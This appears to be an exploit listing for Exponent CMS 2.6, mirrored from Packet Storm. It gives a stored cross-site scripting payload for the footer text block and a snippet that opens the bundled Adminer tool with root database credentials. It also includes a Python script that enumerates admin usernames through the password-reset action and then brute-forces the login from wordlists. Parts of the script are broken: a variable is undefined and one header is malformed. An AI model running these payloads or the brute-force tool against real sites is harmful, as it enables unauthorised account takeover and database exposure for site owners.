Exploit for Exponent CMS 2.6 Cross Site Scripting / Brute Force

Name: Exploit for Exponent CMS 2.6 Cross Site Scripting / Brute Force
Rating: 5 (251 reviews)
2021-12-21 | CVSS -0.5
## https://sploitus.com/exploit?id=PACKETSTORM:165379
# Exploit Title: Exponent CMS 2.6 - Multiple Vulnerabilities  
# Exploit Author: heinjame  
# Date: 22/10/2021  
# Exploit Author: picaro_o  
# Vendor Homepage: https://www.exponentcms.org/  
# Version: <=2.6  
# Tested on: Linux os  
  
*Stored XSS*  
  
Affected parameter = >  
http://127.0.0.1:8082/expcms/text/edit/id/{id}/src/@footer (Title,  
Text Block)  
  
Payload = <iframe/src="data:text/html,<svg onload=alert(1)>">  
  
** *Database credential are disclosed in response ***  
  
POC  
```  
var adminerwindow = function (){  
var win =  
window.open('/expcms/external/adminer/admin.php?server=localhost&username=root&db=exponentcms');  
if (!win) { err(); }  
}  
```  
  
**Authentication Bruteforce*  
```  
import argparse  
import requests  
import sys  
  
parser = argparse.ArgumentParser()  
parser.add_argument("url", help="URL")  
parser.add_argument("Username list", help="Username List")  
parser.add_argument("Password list", help="Password List")  
pargs = parser.parse_args()  
  
host = sys.argv[1]  
userlist = sys.argv[2]  
passlist = sys.argv[3]  
  
try:  
readuser = open(userlist)  
readpass = open(passlist)  
except:  
print("Unable to load files")  
exit()  
def usernamebrute():  
s = requests.Session()  
for username in readuser.readlines():  
brute={  
'controller':(None,'users'),  
'src':(None,''),  
'int':(None,''),  
'action':(None,'send_new_password'),  
'username':(None,username.strip()),  
}  
bruteforce = s.post(host+"/index.php",files=brute)  
status = s.get(host+"/users/reset_password")  
if "administrator" in status.text:  
print("[+] Found username : "+ username)  
adminaccount = username  
checkpoint = True  
return adminaccount,checkpoint  
break  
  
def passwordbrute(adminaccount):  
s = requests.Session()  
s.cookies.set("csrftoken", "abc")  
header = {  
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:78.0)  
Gecko/20100101 Firefox/78.0',  
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',  
'Accept-Language': 'en-US,en;q=0.5',  
'Accept-Encoding': 'gzip, deflate',  
'COntent-TYpE': 'applicatiOn/x-WWW-fOrm-urlencoded1',  
'Referer': host+'/login/showlogin'  
}  
for password in readpass.readlines():  
brute={  
'controller':'login',  
'src':'',  
'int':'',  
'action':'login',  
'username':adminaccount,  
'password':password.strip()  
}  
bruteforce = s.post(host+"/index.php",headers=header,data=brute)  
# print(bruteforce.text)  
status = s.get(host+"/login/showlogin",cookies=csrf)  
print(status.text)  
if "Invalid Username / Password" not in status.text:  
print("[+] Found Password : "+ password)  
break  
  
adminaccount,checkpoint = usernamebrute()  
if checkpoint == True:  
passwordbrute(adminaccount)  
else:  
print("Can't find username,We can't proceed sorry :(")  
  
```